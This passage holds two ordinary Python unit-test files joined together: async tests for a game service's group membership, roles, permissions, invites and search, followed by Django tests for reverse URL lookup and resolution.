GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {})
members = await self.application.groups.list_group_participants(GroupsTestCase.GAMESPACE_ID, group_id)
self.assertEquals(len(members), 1, "Group should have one member from scratch")
self.assertEquals(members[0].account, GroupsTestCase.ACCOUNT_A, "Member should be ACCOUNT_A")
with self.assertRaises(GroupError) as e:
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_A, {"test": "b"})
self.assertEqual(e.exception.code, 409)
members = await self.application.groups.list_group_participants(GroupsTestCase.GAMESPACE_ID, group_id)
self.assertEquals(len(members), 1, "Group should have one member from scratch")
self.assertEquals(members[0].account, GroupsTestCase.ACCOUNT_A, "Member should be ACCOUNT_A")
@gen_test
async def test_join_limit(self):
group_id = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.FREE), 2, GroupsTestCase.ACCOUNT_A, {})
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_B, {"test": "a"})
with self.assertRaises(GroupError) as e:
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_C, {"test": "b"})
@gen_test
async def test_concurrent_group_profile(self):
group_id = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {"value": 1}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
await multi([self.application.groups.update_group(
GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_A, {"value": {"@func": "++", "@value": 1}}
) for x in range(0, 10)])
updated_group = await self.application.groups.get_group(GroupsTestCase.GAMESPACE_ID, group_id)
self.assertEquals(updated_group.profile, {"value": 11})
@gen_test
async def test_concurrent_group_participation_profile(self):
group_id = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"value": 100})
await multi([self.application.groups.update_group_participation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_A,
{"value": {"@func": "--", "@value": 1}}
) for x in range(0, 10)])
updated_group_participation = await self.application.groups.get_group_participation(
GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_A)
self.assertEquals(updated_group_participation.profile, {"value": 90})
@gen_test
async def test_roles(self):
group_id = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_B, {"test": "b"})
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_C, {"test": "c"})
# as an owner I should be able to do that
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_C,
1000, [])
# downgrade own roles
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_C,
500, [])
# now try to push them back up
with self.assertRaises(GroupError):
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_C,
1000, [])
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_B,
200, [])
with self.assertRaises(GroupError):
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B, GroupsTestCase.ACCOUNT_A,
100, [])
@gen_test
async def test_owner(self):
group_id = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_A,
999999999, [])
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_A,
0, [])
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_A,
5000, ["root"])
updated_group_participation = await self.application.groups.get_group_participation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A)
self.assertEqual(updated_group_participation.permissions, {"root"},
"Permissions of account C should be root")
self.assertEqual(updated_group_participation.role, 5000, "Role should be 5000")
@gen_test
async def test_ownership(self):
group_id = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_B, {"test": "b"})
with (self.assertRaises(GroupError)) as e:
await self.application.groups.leave_group(GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A)
self.assertEqual(e.exception.code, 409)
with (self.assertRaises(GroupError)) as e:
await self.application.groups.transfer_ownership(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_C)
self.assertEqual(e.exception.code, 406)
await self.application.groups.transfer_ownership(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_B)
await self.application.groups.leave_group(GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A)
@gen_test
async def test_roles_permissions(self):
group_id = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_B, {"test": "b"})
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_C, {"test": "c"})
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_D, {"test": "d"})
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_B,
200, ["cat", "dog", "cow"])
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B, GroupsTestCase.ACCOUNT_C,
199, ["cow", "cat", "fox"])
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_D,
198, ["cat", "chicken", "pig"])
updated_group_participation = await self.application.groups.get_group_participation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C)
self.assertEqual(updated_group_participation.permissions, {"cat", "cow"},
"Permissions of account C should be cat,cow")
updated_group_participation = await self.application.groups.get_group_participation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_D)
self.assertEqual(updated_group_participation.permissions, {"cat"},
"Permissions of account D should be cat")
@gen_test
async def test_kick(self):
group_id = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_B, {"test": "b"})
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_C, {"test": "c"})
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_D, {"test": "d"})
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_B,
500, [])
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_C,
400, [GroupsModel.PERMISSION_KICK])
await self.application.groups.update_group_participation_permissions(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_D,
300, [])
# kick an owner
with self.assertRaises(GroupError) as e:
await self.application.groups.kick_from_group(
GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_A)
self.assertEqual(e.exception.code, 406, "Should be 'You cannot kick an owner'")
# kick higher role
with self.assertRaises(GroupError) as e:
await self.application.groups.kick_from_group(
GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_B)
self.assertEqual(e.exception.code, 406, "Should be'You cannot kick a player with a higher role'")
# kick with no permissions to
with self.assertRaises(GroupError) as e:
await self.application.groups.kick_from_group(
GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_B, GroupsTestCase.ACCOUNT_C)
self.assertEqual(e.exception.code, 406, "Should be 'You have no permission to kick'")
# should kick just fine
await self.application.groups.kick_from_group(
GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_D)
# kick being owner
await self.application.groups.kick_from_group(
GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_C)
@gen_test
async def test_approve(self):
group_id = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.APPROVE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
# free join to approve-based group is prohibited
with (self.assertRaises(GroupError)) as e:
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_B, {"test": "b"})
self.assertEqual(e.exception.code, 409)
key_b = await self.application.groups.join_group_request(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B, {"bbb": 555})
key_c = await self.application.groups.join_group_request(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, {"ccc": 666})
key_d = await self.application.groups.join_group_request(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_D, {"ddd": 777})
await self.application.groups.approve_join_group(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_B,
900, key_b, ["test"])
# give account C a permission to approve other requests
await self.application.groups.approve_join_group(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_C,
950, key_c, [GroupsModel.PERMISSION_REQUEST_APPROVAL])
# approve by B who has no such permission
with self.assertRaises(GroupError) as e:
await self.application.groups.approve_join_group(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B, GroupsTestCase.ACCOUNT_D,
800, key_d, [])
self.assertEqual(e.exception.code, 406, "Should be 'You have no permission to approve items'")
# approve by C but raise the role more than us
with self.assertRaises(GroupError) as e:
await self.application.groups.approve_join_group(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_D,
960, key_d, [])
self.assertEqual(e.exception.code, 409, "Should be 'Approved role cannot be higher than your role'")
# do the actual approval
await self.application.groups.approve_join_group(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_D,
940, key_d, [])
updated_group_participation_b = await self.application.groups.get_group_participation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B)
updated_group_participation_c = await self.application.groups.get_group_participation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C)
updated_group_participation_d = await self.application.groups.get_group_participation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_D)
self.assertEquals(updated_group_participation_b.role, 900)
self.assertEquals(updated_group_participation_b.profile, {"bbb": 555})
self.assertEquals(updated_group_participation_c.role, 950)
self.assertEquals(updated_group_participation_c.profile, {"ccc": 666})
self.assertEquals(updated_group_participation_d.role, 940)
self.assertEquals(updated_group_participation_d.profile, {"ddd": 777})
# use same key twice
with (self.assertRaises(NoSuchRequest)):
await self.application.groups.approve_join_group(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_B,
950, key_b, ["test"])
@gen_test
async def test_invite(self):
group_id = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.INVITE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
# free join to invite-based group is prohibited
with (self.assertRaises(GroupError)) as e:
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_B, {"test": "b"})
self.assertEqual(e.exception.code, 409)
key_b = await self.application.groups.invite_to_group(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A,
GroupsTestCase.ACCOUNT_B, 500, [])
key_c = await self.application.groups.invite_to_group(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A,
GroupsTestCase.ACCOUNT_C, 600, [GroupsModel.PERMISSION_SEND_INVITE])
await self.application.groups.accept_group_invitation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B, {"b": True}, key_b)
await self.application.groups.accept_group_invitation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, {"c": True}, key_c)
updated_group_participation_b = await self.application.groups.get_group_participation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B)
self.assertEquals(updated_group_participation_b.role, 500)
self.assertEquals(updated_group_participation_b.profile, {"b": True})
updated_group_participation_c = await self.application.groups.get_group_participation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C)
self.assertEquals(updated_group_participation_c.role, 600)
self.assertEquals(updated_group_participation_c.profile, {"c": True})
with (self.assertRaises(GroupError)) as e:
await self.application.groups.invite_to_group(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B,
GroupsTestCase.ACCOUNT_D, 400, [])
self.assertEqual(e.exception.code, 406, "Should be 'You have no permission to send invites'")
key_d = await self.application.groups.invite_to_group(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C,
GroupsTestCase.ACCOUNT_D, 400, [])
# use wrong key
with (self.assertRaises(GroupError)) as e:
await self.application.groups.accept_group_invitation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_D, {"d": False}, key_c)
self.assertEqual(e.exception.code, 410, "Should be 'No such invite request'")
await self.application.groups.accept_group_invitation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_D, {"d": False}, key_d)
updated_group_participation_d = await self.application.groups.get_group_participation(
GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_D)
self.assertEquals(updated_group_participation_d.role, 400)
self.assertEquals(updated_group_participation_d.profile, {"d": False})
@gen_test
async def test_search(self):
group_a = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.INVITE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"},
group_name="Lorem ipsum dolor sit amet, consectetur adipiscing elit, including same text at the end!")
group_b = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.INVITE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"},
group_name="The quick brown fox jumps over the lazy dog, including same text at the end!")
result_1 = await self.application.groups.search_groups(GroupsTestCase.GAMESPACE_ID, "quick brown fox")
self.assertEquals(len(result_1), 1)
self.assertEquals(result_1[0].group_id, group_b)
result_2 = await self.application.groups.search_groups(GroupsTestCase.GAMESPACE_ID, "Lor")
self.assertEquals(len(result_2), 1)
self.assertEquals(result_2[0].group_id, group_a)
result_3 = await self.application.groups.search_groups(GroupsTestCase.GAMESPACE_ID, "including same text")
self.assertEquals(len(result_3), 2)
|
|
"""
Unit tests for reverse URL lookups.
"""
from __future__ import unicode_literals
import unittest
from django.conf import settings
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.core.urlresolvers import (reverse, resolve, get_callable,
get_resolver, NoReverseMatch, Resolver404, ResolverMatch, RegexURLResolver,
RegexURLPattern)
from django.http import HttpRequest, HttpResponseRedirect, HttpResponsePermanentRedirect
from django.shortcuts import redirect
from django.test import TestCase
from django.utils import six
from . import urlconf_outer, middleware, views
resolve_test_data = (
# These entries are in the format: (path, url_name, app_name, namespace, view_func, args, kwargs)
# Simple case
('/normal/42/37/', 'normal-view', None, '', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
('/view_class/42/37/', 'view-class', None, '', views.view_class_instance, tuple(), {'arg1': '42', 'arg2': '37'}),
('/included/normal/42/37/', 'inc-normal-view', None, '', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
('/included/view_class/42/37/', 'inc-view-class', None, '', views.view_class_instance, tuple(), {'arg1': '42', 'arg2': '37'}),
# Unnamed args are dropped if you have *any* kwargs in a pattern
('/mixed_args/42/37/', 'mixed-args', None, '', views.empty_view, tuple(), {'arg2': '37'}),
('/included/mixed_args/42/37/', 'inc-mixed-args', None, '', views.empty_view, tuple(), {'arg2': '37'}),
# Unnamed views will be resolved to the function/class name
('/unnamed/normal/42/37/', 'urlpatterns_reverse.views.empty_view', None, '', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
('/unnamed/view_class/42/37/', 'urlpatterns_reverse.views.ViewClass', None, '', views.view_class_instance, tuple(), {'arg1': '42', 'arg2': '37'}),
# If you have no kwargs, you get an args list.
('/no_kwargs/42/37/', 'no-kwargs', None, '', views.empty_view, ('42','37'), {}),
('/included/no_kwargs/42/37/', 'inc-no-kwargs', None, '', views.empty_view, ('42','37'), {}),
# Namespaces
('/test1/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns1', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/included/test3/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/ns-included1/normal/42/37/', 'inc-normal-view', None, 'inc-ns1', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
('/included/test3/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/default/inner/42/37/', 'urlobject-view', 'testapp', 'testapp', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/other2/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns2', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/other1/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns1', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
# Nested namespaces
('/ns-included1/test3/inner/42/37/', 'urlobject-view', 'testapp', 'inc-ns1:test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/ns-included1/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view', 'testapp', 'inc-ns1:inc-ns4:inc-ns2:test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
# Namespaces capturing variables
('/inc70/', 'inner-nothing', None, 'inc-ns5', views.empty_view, tuple(), {'outer': '70'}),
('/inc78/extra/foobar/', 'inner-extra', None, 'inc-ns5', views.empty_view, tuple(), {'outer':'78', 'extra':'foobar'}),
)
test_data = (
('places', '/places/3/', [3], {}),
('places', '/places/3/', ['3'], {}),
('places', NoReverseMatch, ['a'], {}),
('places', NoReverseMatch, [], {}),
('places?', '/place/', [], {}),
('places+', '/places/', [], {}),
('places*', '/place/', [], {}),
('places2?', '/', [], {}),
('places2+', '/places/', [], {}),
('places2*', '/', [], {}),
('places3', '/places/4/', [4], {}),
('places3', '/places/harlem/', ['harlem'], {}),
('places3', NoReverseMatch, ['harlem64'], {}),
('places4', '/places/3/', [], {'id': 3}),
('people', NoReverseMatch, [], {}),
('people', '/people/adrian/', ['adrian'], {}),
('people', '/people/adrian/', [], {'name': 'adrian'}),
('people', NoReverseMatch, ['name with spaces'], {}),
('people', NoReverseMatch, [], {'name': 'name with spaces'}),
('people2', '/people/name/', [], {}),
('people2a', '/people/name/fred/', ['fred'], {}),
('people_backref', '/people/nate-nate/', ['nate'], {}),
('people_backref', '/people/nate-nate/', [], {'name': 'nate'}),
('optional', '/optional/fred/', [], {'name': 'fred'}),
('optional', '/optional/fred/', ['fred'], {}),
('hardcoded', '/hardcoded/', [], {}),
('hardcoded2', '/hardcoded/doc.pdf', [], {}),
('people3', '/people/il/adrian/', [], {'state': 'il', 'name': 'adrian'}),
('people3', NoReverseMatch, [], {'state': 'il'}),
('people3', NoReverseMatch, [], {'name': 'adrian'}),
('people4', NoReverseMatch, [], {'state': 'il', 'name': 'adrian'}),
('people6', '/people/il/test/adrian/', ['il/test', 'adrian'], {}),
('people6', '/people//adrian/', ['adrian'], {}),
('range', '/character_set/a/', [], {}),
('range2', '/character_set/x/', [], {}),
('price', '/price/$10/', ['10'], {}),
('price2', '/price/$10/', ['10'], {}),
('price3', '/price/$10/', ['10'], {}),
('product', '/product/chocolate+($2.00)/', [], {'price': '2.00', 'product': 'chocolate'}),
('headlines', '/headlines/2007.5.21/', [], dict(year=2007, month=5, day=21)),
('windows', r'/windows_path/C:%5CDocuments%20and%20Settings%5Cspam/', [], dict(drive_name='C', path=r'Documents and Settings\spam')),
('special', r'/special_chars/%2B%5C%24%2A/', [r'+\$*'], {}),
('special', r'/special_chars/some%20resource/', [r'some resource'], {}),
('special', r'/special_chars/10%25%20complete/', [r'10% complete'], {}),
('special', r'/special_chars/some%20resource/', [], {'chars': r'some resource'}),
('special', r'/special_chars/10%25%20complete/', [], {'chars': r'10% complete'}),
('special', NoReverseMatch, [''], {}),
('mixed', '/john/0/', [], {'name': 'john'}),
('repeats', '/repeats/a/', [], {}),
('repeats2', '/repeats/aa/', [], {}),
('repeats3', '/repeats/aa/', [], {}),
('insensitive', '/CaseInsensitive/fred', ['fred'], {}),
('test', '/test/1', [], {}),
('test2', '/test/2', [], {}),
('inner-nothing', '/outer/42/', [], {'outer': '42'}),
('inner-nothing', '/outer/42/', ['42'], {}),
('inner-nothing', NoReverseMatch, ['foo'], {}),
('inner-extra', '/outer/42/extra/inner/', [], {'extra': 'inner', 'outer': '42'}),
('inner-extra', '/outer/42/extra/inner/', ['42', 'inner'], {}),
('inner-extra', NoReverseMatch, ['fred', 'inner'], {}),
('disjunction', NoReverseMatch, ['foo'], {}),
('inner-disjunction', NoReverseMatch, ['10', '11'], {}),
('extra-places', '/e-places/10/', ['10'], {}),
('extra-people', '/e-people/fred/', ['fred'], {}),
('extra-people', '/e-people/fred/', [], {'name': 'fred'}),
('part', '/part/one/', [], {'value': 'one'}),
('part', '/prefix/xx/part/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/part2/one/', [], {'value': 'one'}),
('part2', '/part2/', [], {}),
('part2', '/prefix/xx/part2/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/prefix/xx/part2/', [], {'prefix': 'xx'}),
# Regression for #9038
# These views are resolved by method name. Each method is deployed twice -
# once with an explicit argument, and once using the default value on
# the method. This is potentially ambiguous, as you have to pick the
# correct view for the arguments provided.
('kwargs_view', '/arg_view/', [], {}),
('kwargs_view', '/arg_view/10/', [], {'arg1':10}),
('urlpatterns_reverse.views.absolute_kwargs_view', '/absolute_arg_view/', [], {}),
('urlpatterns_reverse.views.absolute_kwargs_view', '/absolute_arg_view/10/', [], {'arg1':10}),
('non_path_include', '/includes/non_path_include/', [], {}),
# Tests for #13154
('defaults', '/defaults_view1/3/', [], {'arg1': 3, 'arg2': 1}),
('defaults', '/defaults_view2/3/', [], {'arg1': 3, 'arg2': 2}),
('defaults', NoReverseMatch, [], {'arg1': 3, 'arg2': 3}),
('defaults', NoReverseMatch, [], {'arg2': 1}),
)
class NoURLPatternsTests(TestCase):
urls = 'urlpatterns_reverse.no_urls'
def test_no_urls_exception(self):
"""
RegexURLResolver should raise an exception when no urlpatterns exist.
"""
resolver = RegexURLResolver(r'^$', self.urls)
self.assertRaisesMessage(ImproperlyConfigured,
"The included urlconf urlpatterns_reverse.no_urls "\
"doesn't have any patterns in it", getattr, resolver, 'url_patterns')
class URLPatternReverse(TestCase):
urls = 'urlpatterns_reverse.urls'
def test_urlpattern_reverse(self):
for name, expected, args, kwargs in test_data:
try:
got = reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.assertEqual(expected, NoReverseMatch)
else:
self.assertEqual(got, expected)
def test_reverse_none(self):
# Reversing None should raise an error, not return the last un-named view.
self.assertRaises(NoReverseMatch, reverse, None)
def test_prefix_braces(self):
self.assertEqual('/%7B%7Binvalid%7D%7D/includes/non_path_include/',
reverse('non_path_include', prefix='/{{invalid}}/'))
def test_prefix_parenthesis(self):
self.assertEqual('/bogus%29/includes/non_path_include/',
reverse('non_path_include', prefix='/bogus)/'))
def test_prefix_format_char(self):
self.assertEqual('/bump%2520map/includes/non_path_include/',
reverse('non_path_include', prefix='/bump%20map/'))
def test_non_urlsafe_prefix_with_args(self):
# Regression for #20022
self.assertEqual('/%7Eme/places/1/',
reverse('places', args=[1], prefix='/~me/'))
def test_patterns_reported(self):
# Regression for #17076
try:
# this url exists, but requires an argument
reverse("people", args=[])
except NoReverseMatch as e:
pattern_description = r"1 pattern(s) tried: ['people/(?P<name>\\w+)/$']"
self.assertIn(pattern_description, str(e))
else:
# we can't use .assertRaises, since we want to inspect the
# exception
self.fail("Expected a NoReverseMatch, but none occurred.")
class ResolverTests(unittest.TestCase):
def test_resolver_repr(self):
"""
Test repr of RegexURLResolver, especially when urlconf_name is a list
(#17892).
"""
# Pick a resolver from a namespaced urlconf
resolver = get_resolver('urlpatterns_reverse.namespace_urls')
sub_resolver = resolver.namespace_dict['test-ns1'][1]
self.assertIn('<RegexURLPattern list>', repr(sub_resolver))
def test_non_regex(self):
"""
Verifies that we raise a Resolver404 if what we are resolving doesn't
meet the basic requirements of a path to match - i.e., at the very
least, it matches the root pattern '^/'. We must never return None
from resolve, or we will get a TypeError further down the line.
Regression for #10834.
"""
self.assertRaises(Resolver404, resolve, '')
self.assertRaises(Resolver404, resolve, 'a')
self.assertRaises(Resolver404, resolve, '\\')
self.assertRaises(Resolver404, resolve, '.')
def test_404_tried_urls_have_names(self):
"""
Verifies that the list of URLs that come back from a Resolver404
exception contains a list in the right format for printing out in
the DEBUG 404 page with both the patterns and URL names, if available.
"""
urls = 'urlpatterns_reverse.named_urls'
# this list matches the expected URL types and names returned when
# you try to resolve a non-existent URL in the first level of included
# URLs in named_urls.py (e.g., '/included/non-existent-url')
url_types_names = [
[{'type': RegexURLPattern, 'name': 'named-url1'}],
[{'type': RegexURLPattern, 'name': 'named-url2'}],
[{'type': RegexURLPattern, 'name': None}],
[{'type': RegexURLResolver}, {'type': RegexURLPattern, 'name': 'named-url3'}],
[{'type': RegexURLResolver}, {'type': RegexURLPattern, 'name': 'named-url4'}],
[{'type': RegexURLResolver}, {'type': RegexURLPattern, 'name': None}],
[{'type': RegexURLResolver}, {'type': RegexURLResolver}],
]
try:
resolve('/included/non-existent-url', urlconf=urls)
self.fail('resolve did not raise a 404')
except Resolver404 as e:
# make sure we at least matched the root ('/') url resolver:
self.assertTrue('tried' in e.args[0])
tried = e.args[0]['tried']
self.assertEqual(len(e.args[0]['tried']), len(url_types_names), 'Wrong number of tried URLs returned. Expected %s, got %s.' % (len(url_types_names), len(e.args[0]['tried'])))
for tried, expected in zip(e.args[0]['tried'], url_types_names):
for t, e in zip(tried, expected):
self.assertIsInstance(t, e['type']), str('%s is not an instance of %s') % (t, e['type'])
if 'name' in e:
if not e['name']:
self.assertTrue(t.name is None, 'Expected no URL name but found %s.' % t.name)
else:
self.assertEqual(t.name, e['name'], 'Wrong URL name. Expected "%s", got "%s".' % (e['name'], t.name))
class ReverseLazyTest(TestCase):
urls = 'urlpatterns_reverse.reverse_lazy_urls'
def test_redirect_with_lazy_reverse(self):
response = self.client.get('/redirect/')
self.assertRedirects(response, "/redirected_to/", status_code=301)
def test_user_permission_with_lazy_reverse(self):
user = User.objects.create_user('alfred', 'alfred@example.com', password='testpw')
response = self.client.get('/login_required_view/')
self.assertRedirects(response, "/login/?next=/login_required_view/", status_code=302)
self.client.login(username='alfred', password='testpw')
response = self.client.get('/login_required_view/')
self.assertEqual(response.status_code, 200)
